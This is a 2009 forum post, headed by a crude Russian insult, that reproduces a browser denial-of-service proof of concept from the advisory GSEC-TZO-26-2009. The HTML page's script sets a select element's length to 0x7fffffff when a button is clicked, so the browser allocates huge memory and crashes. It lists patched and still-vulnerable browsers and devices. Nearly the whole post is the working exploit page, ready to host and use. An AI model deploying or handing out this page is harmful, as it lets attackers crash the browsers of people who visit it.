john77 (SV!) [Off] [#] (18.07.2009 / 17:50) чморылое одоробло

<html><head>

<script>
function poc(o) {
e = document.createElement("select");
e.length=2147483647;
}

function go() {
poc(0);
}
</script>
<form>
<font face= "courier new" size ="2">
Reference : [GSEC-TZO-26-2009] - One bug to rule them all<br>
WWW : <a href="http://www.g-sec.lu/one-bug-to-rule-them-all.html">G-SEC</a><br>
Credit : Thierry Zoller <br>
Root Cause : Design bug (non clamped)<br>
<br>
Browser will allocate huge chunks of memory and then most likely crash.<br>

Known patches: Firefox, Chrome, Safari, Opera<br>
Still vulnerable : IE5, IE6, IE7, IE8, WII, PS3, Nokia, Blackberry, Konqueror<br>

<b>Click "Select.lenght 0x7fffffff</b><br><br></font>

<input onclick="go()" value="Select lenght 0x7fffffff" type="button">
</form>
</body></html>